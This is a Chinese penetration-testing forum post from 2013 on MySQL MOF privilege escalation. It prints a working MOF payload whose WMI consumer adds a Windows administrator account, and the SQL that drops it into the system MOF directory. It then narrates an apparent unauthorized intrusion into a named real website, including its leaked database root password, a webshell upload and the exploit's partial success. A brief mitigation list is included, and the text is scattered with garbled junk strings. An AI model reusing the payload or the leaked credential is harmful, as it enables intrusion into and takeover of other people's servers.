中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]

作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
) w! @2 N8 ?3 D. U( K( ]
* [: b* G# O; i7 F网上公开的一些利用代码:
( D) x. x; o! l# o0 K+ v  z* S+ y3 C3 W
#pragma namespace(“\\\\.\\root\\subscription”)# G8 a$ C8 X6 o# G8 x

' F; ~1 V% v/ ~: w" K( P/ ginstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };! X3 U& G$ b% @* i+ P

8 R: k. s" E8 |/ e- r* R 7 z: g6 U! M" L) j" f  R

0 h! `3 j) m+ p& h9 ?  o
* k- I: ]4 A% L/ }& C0 a0 ]- p; \) k
) m* @7 p9 H4 _+ Y连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;4 R5 ?5 L3 v8 S
从上面代码来看得出解决办法:
, P8 V! w' P$ T- H
# Q' V& d' N( F% Y2 U8 J9 I$ @% S1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数4 V# Y% ~- I3 U

7 t  y- ]! f7 Y$ {' L* [2、禁止使用”WScript.Shel”组件
3 P5 c+ B. e( h" X* ]0 n/ ]$ V" L$ G; c8 @: C" [' A4 m! b# t
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER$ m7 l$ e9 l& ~" j' A" o* B
! O3 T1 M. Y  A
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
0 I6 I' _" }5 S! c' y. {
7 |, @, ]5 U" Q% r! N事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
  l" O1 c' H1 Z! p; g/ k, R5 f: h7 j9 G7 K" A  x
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容0 D6 K+ L: I3 B% e9 F# d, @. F
) E. ?& J0 g' P# v5 Q5 j
看懂了后就开始练手吧1 R# i& w9 h! B: o6 H
. v+ E8 M, c8 M# F  d" ~
http://www.webbmw.com/config/config_ucenter.php 一句话 a8 d6 W# R0 b3 h1 R6 g

; Y6 e0 u: X# `$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
+ ?2 t7 D+ |- z4 k- _7 e7 M9 `) j! X8 H! Q
于是直接用菜刀开搞
- I. l4 J7 g, N8 _6 r
3 }0 i$ j# J( E& s6 _" P上马先
: m. v) I' V9 g9 C% k" v0 b; l) b7 v# O
既然有了那些账号 之类的 于是我们就执行吧…….
1 Z" o5 U+ B, ]6 ?% Y% O6 X. ^" f6 v% \( M8 |2 z0 ]
小小的说下
. J- ~9 ^6 U+ z+ E6 e# ^
, B8 T. I# ~( H( E+ {& {; |8 n4 F在这里第1次执行未成功        原因未知8 w: t9 e6 E/ p- i6 {

+ l8 y; g+ j2 R" S( W' F3 D我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。: R2 P9 \$ Q9 o4 D. t: K4 E, \9 ]
! P: U; |2 r3 ?  j$ Q" R0 Q+ A0 X
#pragma namespace(“\\\\.\\root\\subscription”)6 @  s- j- Q5 b

+ e8 ~) i' ^. Z* n5 u3 T( Z% Kinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };( `* G) Q( i" _1 x/ u

8 O9 U) T9 f& d& J我是将文件放到C:\WINDOWS\temp\1.mof
; s/ Y  Z* U5 X. k& h
& l# e7 r; f1 p, o% X* N5 [0 n所以我们就改下执行的代码$ ^- ]( _  e- z9 x4 j

9 t1 f4 F9 K4 Xselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
; ?$ r6 p/ n- e0 I2 o3 D' Z& u- g2 T6 `' k8 }4 T9 \
+ s9 ~* f* G; m

1 [9 }7 R8 x" }9 X4 \但是 你会发现账号还是没有躺在那里。。
2 U- C5 W- `! y; N! }  p# M
8 q0 i% f- K3 ~2 C( a! ^5 ?于是我就感觉蛋疼
0 E: O4 ], |  [" a; ~1 t% D
$ l$ r% _! J% \/ u, G就去一个一个去执行 但是执行到第2个 mysql时就成功了………
# L1 `" {6 q% T5 V7 i3 f3 ]1 ]! ]. O. c
& ]* j- a5 n/ _# t/ R/ u* |; p  q; S+ O

# w9 H( S4 s6 W' `5 Y+ J7 Q但是其他库均不成功…
; T- `  g4 E3 c' X% Q
3 `+ I' W# L: M* j5 }& ?3 z我就很费解呀 到底为什么不成功求大牛解答…" o2 U# g+ j% b! [' r

8 y5 H% W. f# m: C1 [( W& n0 y6 d; [$ V& u3 S2 h
) B, ^1 o3 L9 p





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2